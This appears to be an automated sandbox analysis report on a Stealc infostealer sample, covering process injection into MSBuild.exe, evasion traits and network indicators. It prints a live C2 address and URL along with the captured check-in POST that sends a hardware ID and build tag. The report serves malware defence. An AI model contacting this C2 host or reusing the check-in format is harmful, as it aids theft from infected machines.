Windows Analysis Report 1f13Cs1ogc.exe

Uses insecure TLS / SSL version for HTTPS connection

Source: 1f13Cs1ogc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2

Source: 1f13Cs1ogc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FF9ABF FindFirstFileExW,

Suricata IDS alerts for network traffic

Networking

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

3_2_00406280

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--

Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/bJ
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/j
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150t
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150~
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2

Detected potential crypto function

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE2021	0_2_00FE2021
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE729C	0_2_00FE729C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFD39B	0_2_00FFD39B
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF572C	0_2_00FF572C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_0103094F	0_2_0103094F
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FECAF2	0_2_00FECAF2
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFBB36	0_2_00FFBB36
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF3C92	0_2_00FF3C92
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE1D79	0_2_00FE1D79
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FEFEF0	0_2_00FEFEF0

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: String function: 00FE7B80 appears 49 times

One or more processes crash

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288

Sample file is different than original file name gathered from version info

Source: 1f13Cs1ogc.exe, 00000000.00000000.2073157229.000000000105C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe
Source: 1f13Cs1ogc.exe	Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe

Source: 1f13Cs1ogc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1f13Cs1ogc.exe

Static PE information: Section: .data ZLIB complexity 0.9899375

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/5@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YWUXZ2ST.htm

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\768828e0-684a-4eb3-ba57-5c773a6c2dfb

Source: 1f13Cs1ogc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: 1f13Cs1ogc.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\1f13Cs1ogc.exe "C:\Users\user\Desktop\1f13Cs1ogc.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Contains functionality to dynamically determine API calls

Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1f13Cs1ogc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 1f13Cs1ogc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE71AD push ecx; ret	0_2_00FE71C0
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_01027F0D push ecx; ret	0_2_01027F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B035 push ecx; ret	3_2_0041B048

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

API coverage: 4.1 %

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FF9ABF FindFirstFileExW,

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00401160 GetSystemInfo,

3_2_00401160

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
